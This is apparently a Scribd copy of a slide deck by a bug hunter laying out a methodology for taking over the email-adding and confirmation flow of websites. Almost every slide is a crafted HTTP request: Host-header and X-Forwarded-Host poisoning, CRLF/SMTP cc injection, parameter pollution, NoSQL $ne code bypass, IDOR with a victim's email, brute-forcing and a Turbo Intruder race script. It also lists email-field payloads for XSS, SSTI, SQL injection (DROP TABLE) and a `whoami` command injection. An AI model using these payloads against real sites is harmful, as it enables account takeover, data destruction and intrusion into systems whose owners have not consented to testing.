Scribd
Upload
59 views

Adding Email

The document discusses various techniques for manipulating HTTP headers to trick a website into sending an email confirmation code to an attacker's domain, including changing the host header, adding additional host headers, using non-standard headers, and ambiguating values in headers like using [email protected]. The goal is to get the confirmation email sent to the attacker instead of the intended recipient.

Uploaded by

hacker
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
59 views

Adding Email

The document discusses various techniques for manipulating HTTP headers to trick a website into sending an email confirmation code to an attacker's domain, including changing the host header, adding additional host headers, using non-standard headers, and ambiguating values in headers like using [email protected]. The goal is to get the confirmation email sent to the attacker instead of the intended recipient.

Uploaded by

hacker
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 31

ETO

Adding E-mail
Adding E-mail

Mahmoud M. Awali
@0xAwali
My Methodology

attacker

Try To Change Host Header e.g. Host: me.com To Get The Confirmation Code

● Slides POST /addEmail HTTP/1.1


Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Override The Host Header e.g. POST https://company.com AND Change Host
Header e.g Host: me.com To Get The Confirmation Code

● Mine POST https://company.com/addEmail HTTP/1.1


Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Ambiguate The Host Header e.g. Host: [email protected] To


Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: [email protected]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Ambiguate The Host Header e.g. Host: company.com:@me.com To


Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: company.com:@me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Ambiguate The Host Header e.g. Host: company.com: me.com To


Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: company.com: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Change Routing Of The Request e.g. POST @me.com/addEmail OR


POST :@me.com/addEmail To Get The Confirmation Code

● Mine
POST @me.com/addEmail HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Change Routing Of The Request e.g. POST /[email protected]# OR


POST @me.com/addEmail To Get The Confirmation Code

● Mine
POST /[email protected]# HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Change Routing Of The Request e.g. POST /[email protected]# OR


POST /addEmail:@me.com# With HTTP/1.0 To Get The Confirmation Code

● Mine
POST /[email protected]# HTTP/1.0
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Add Another Host Header e.g. Host: me.com To Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: www.company.com
Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Add Another Space-surrounded Host Header e.g. Host:me.com


To Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: www.company.com
Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Change Host Header e.g. Host: me.com AND Add X-Forwarded-Host Header
Too e.g. X-Forwarded-Host: me.com To Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: me.com
X-Forwarded-Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Change Host Header e.g. Host: me.com AND Add X-Forwarded-Host Header
Too e.g. X-Forwarded-Host: company.com To Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: me.com
X-Forwarded-Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Add X-Forwarded-Host Header e.g. X-Forwarded-Host: company.com AND


Referer Header Too e.g. Referer: https://me.com To Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: www.company.com
X-Forwarded-Host: me.com
Referer: https://me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Use Noun-Standard Headers e.g. X-Forwarded-For , X-Forwarded-Host ,


X-Client-IP , True-­Client-­IP AND X-Originating-IP etc To Get The Confirmation Code

● Mine POST /addEmail HTTP/1.1


Host: www.company.com
X-Forwarded-For: me.com
X-Forwarded-Host: me.com
X-Client-IP: me.com
X-Originating-IP: me.com
X­-WAP­-Profile: https://me.com/file.xml
True-­Client-­IP: me.com
Referer: https://me.com/
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Use Noun-Standard Headers e.g. X-Forwarded-For , X-Forwarded-Host ,


X-Client-IP , True-­Client-­IP AND X-Originating-IP With e.g. [email protected]

● Mine POST /addEmail HTTP/1.1


Host: www.company.com
X-Forwarded-For: [email protected]
X-Forwarded-Host: [email protected]
X-Client-IP: [email protected]
X-Originating-IP: [email protected]
X­-WAP­-Profile: https://[email protected]/file.xml
True-­Client-­IP: [email protected]
Referer: https://[email protected]/
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Use Noun-Standard Headers e.g. X-Forwarded-For , X-Forwarded-Host ,


X-Client-IP , True-­Client-­IP AND X-Originating-IP With e.g. me.com/.company.com

● Mine POST /addEmail HTTP/1.1


Host: www.company.com
X-Forwarded-For: me.com/.company.com
X-Forwarded-Host: me.com/.company.com
X-Client-IP: me.com/.company.com
X-Originating-IP: me.com/.company.com
X­-WAP­-Profile: https://me.com/.company.com/file.xml
True-­Client-­IP: me.com/.company.com
Referer: https://me.com/.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Use CRLF and Host Header Injection e.g. ?0a%0dHost:me.com AND You
Can Use Others Headers e.g. X-Host , True-Client-IP AND X-Forwarded-Host etc

● Mine POST /resetPassword?0a%0dHost:me.com HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&csrf=*******
My Methodology

attacker

Try To Add Email e.g. [email protected]ğhotmail.com , Maybe Backend Think Your


Email Is [email protected]?hotmail.com So You Can Takeover This Email

● Tweet
My Methodology

attacker

Try To Use CRLF and SMTP Injection e.g. [email protected]%0a%0d


cc:[email protected] To Receive The Confirmation Code In Your Mail

● Mine POST /resetPassword HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]%0a%0dcc:[email protected]&
csrf=*******
My Methodology

attacker

Try To Use Parameter Pollution Technique e.g.


[email protected]&[email protected] To Get The Confirmation Code Too

● Mine POST /resetPassword HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&[email protected]&csrf=****
***
My Methodology

attacker

Try To Use Separators e.g. | , %20 OR , To Get The Confirmation Code Too

● Mine POST /resetPassword HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected],[email protected]&csrf=*******
My Methodology

attacker

Try To Change Content Type Header To application/json AND Insert Value Of Email As Array e.g
{"email":["[email protected]","[email protected]"]} To Get The Confirmation Code Too

POST /resetPassword HTTP/1.1


● Mine Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":
["[email protected]","[email protected]"],"csrf":"*******"}
My Methodology

attacker

Sometimes They Ping Your Host Before Sending A Mail So Try To Use Burp
Collaborator Mail Address with Injection OS Command To Get RCE

● Tweet POST /resetPassword HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

email=me@`whoami`.id.collaborator.net&csrf=*******
My Methodology

attacker

Use This List Of Payloads As Email Addresses To Get XSS , SSTI , SQLi OR
Abusing Of Database

● Tweet me+(<script>alert(0)</script>)@gmail.com
me(<script>alert(0)</script>)@gmail.com
● Tweet me@gmail(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
"<%= 7 * 7 %>"@gmail.com
● Tweet me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
● Video "me); DROP TABLE users;--"@gmail.com
me@[id.collaborator.net]
● Writeup %@gmail.com
My Methodology

attacker

Enter Correct Email AND Wrong Code Then Try To Manipulate The Response To
Change The Response To Response Of The Correct Confirmation Code To Get ETO

● Mine HTTP/1.1 200 OK


Access-Control-Allow-Origin: https://www.company.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length

{
"email" : "[email protected]" ,
"code" : ******
}
My Methodology

attacker

Try To Use IDOR Technique By Inserting Email Address Of Victim e.g.


[email protected] With Your Token To Takeover This E-mail

● Mine POST /addEmail/Verify HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&code=Your-Token&csrf=*******
My Methodology

attacker

Try To Change Content Type Header To application/json AND Insert Value Of Code As Array e.g
{"code":["$ne","WrongCODE"]} To Bypass The Confirmation Code

● Slides POST /addEmail/Verify HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"[email protected]","csrf":"*******","code":
{"$ne":"wrong"}]}
My Methodology

attacker

Try To Brute Force The Confirmation Code Using Multiple IPs Or Using IP Rotate
Burp Suite Extension

● Mine POST /addEmail/Verify HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

[email protected]&code=FUZZ&csrf=*******
My Methodology

attacker

Try To Figure Out Reaction Of The Server While Doing Race Condition By Using
Turbo Intruder OR Nuclei To Send Simultaneously Requests

POST /addEmail/verify HTTP/1.1


● Blog Host: www.company.com
X-Test: %s
● Blog [email protected]&otp=wrongOTP&csrf=*******

def queueRequests(target, wordlists):


engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False
)
for i in range(30):
engine.queue(target.req, target.baseInput, gate='race1')
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)
Thank
You
Mahmoud M. Awali
@0xAwali

You might also like